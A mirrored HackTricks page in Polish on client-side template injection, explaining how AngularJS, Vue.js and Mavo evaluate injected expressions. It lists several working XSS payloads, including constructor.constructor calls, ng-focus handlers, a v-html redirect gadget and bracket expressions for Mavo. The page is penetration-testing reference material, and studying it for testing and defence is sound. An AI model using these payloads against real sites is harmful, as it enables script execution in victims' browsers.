Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/client-side-template-injection-csti.md
Translator workflow 5e0daf0e23 Translated to Polish
2024-02-11 01:46:25 +00:00

7 KiB
Raw Blame History

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podsumowanie

To jest jak Server Side Template Injection, ale po stronie klienta. SSTI pozwala na wykonanie kodu na zdalnym serwerze, a CSTI pozwala na wykonanie dowolnego kodu JavaScript na ofierze.

Sposób testowania tej podatności jest bardzo podobny do przypadku SSTI, interpreter oczekuje, że coś zostanie wykonane między podwójnymi kluczami i to zostanie wykonane. Na przykład, używając czegoś takiego jak: {{ 7-7 }}, jeśli serwer jest podatny, zobaczysz 0, a jeśli nie, zobaczysz oryginalne: {{ 7-7 }}

AngularJS

AngularJS to powszechnie używany framework JavaScript, który współdziała z HTML za pomocą atrybutów znanych jako dyrektywy, z czego jedną z nich jest ng-app. Ta dyrektywa pozwala AngularJS przetwarzać zawartość HTML, umożliwiając wykonywanie wyrażeń JavaScript wewnątrz podwójnych nawiasów klamrowych.

W przypadkach, gdy dane wprowadzane przez użytkownika są dynamicznie wstawiane do ciała HTML oznaczonego jako ng-app, możliwe jest wykonanie dowolnego kodu JavaScript. Można to osiągnąć, wykorzystując składnię AngularJS wewnątrz wprowadzanego tekstu. Poniżej znajdują się przykłady demonstrujące, jak można wykonać kod JavaScript:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Możesz znaleźć bardzo podstawowy przykład online tej podatności w AngularJS na stronie http://jsfiddle.net/2zs2yv7o/ oraz w Burp Suite Academy

{% hint style="danger" %} Angular 1.6 usunął sandbox więc od tej wersji powinien działać payload taki jak {{constructor.constructor('alert(1)')()}} lub <input ng-focus=$event.view.alert('XSS')>. {% endhint %}

VueJS

Możesz znaleźć podatną implementację vue.js pod adresem https://vue-client-side-template-injection-example.azu.now.sh/
Działający payload: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

A źródłowy kod podatnego przykładu znajduje się tutaj: https://github.com/azu/vue-client-side-template-injection-example

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

Naprawdę dobry post na temat CSTI w VUE można znaleźć pod adresem https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

V3

{{_openBlock.constructor('alert(1)')()}}

Kredyt: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Kredyt: Mario Heiderich

Sprawdź więcej ładunków VUE na https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Ładunek:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

Więcej payloadów w https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations

Lista wykrywania Brute-Force

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: